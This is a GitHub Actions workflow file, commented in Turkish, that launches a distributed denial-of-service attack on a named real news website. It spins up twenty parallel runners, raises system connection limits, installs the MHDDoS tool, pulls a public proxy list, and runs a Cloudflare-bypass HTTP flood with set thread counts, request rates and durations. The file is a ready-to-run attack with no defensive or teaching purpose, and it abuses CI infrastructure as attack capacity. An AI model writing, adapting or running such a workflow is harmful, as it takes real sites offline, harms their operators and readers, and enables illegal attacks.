name: MHDDoS Ultra Power
on: workflow_dispatch

jobs:
  mhddos-attack:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        # 20 paralel makine
        machine: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20]
    
    steps:
      - name: Sistemi Hazırla
        run: |
          sudo sysctl -w net.ipv4.ip_local_port_range="1024 65535"
          sudo prlimit --pid $$ --nofile=1000000:1000000 || true
          sudo apt update && sudo apt install python3-pip -y

      - name: MHDDoS Kurulum
        run: |
          git clone https://github.com/MatrixTM/MHDDoS.git
          cd MHDDoS
          pip3 install -r requirements.txt

      - name: Proxy Listesi Al ve Ateşle
        run: |
          cd MHDDoS
          # Güncel proxy listesini otomatik indir (proxy.txt boş olmasın diye)
          curl -s https://api.proxyscrape.com/v2/?request=displayproxies&protocol=http&timeout=10000&country=all&ssl=all&anonymity=all > proxy.txt
          
          ulimit -n 1000000 || true
          
          # CFB: Cloudflare Bypass Metodu
          # https://kurdistantv.net/: Hedef
          # 5: Thread sayısı (Genelde 5-10 idealdir)
          # 1000: RPC (Saniye başına istek)
          # proxy.txt: Proxy dosyası
          # 1000: Bağlantı süresi
          # 1000: Toplam süre (saniye)
          
          python3 start.py CFB https://kurdistantv.net/ 5 2500 proxy.txt 2500 2500
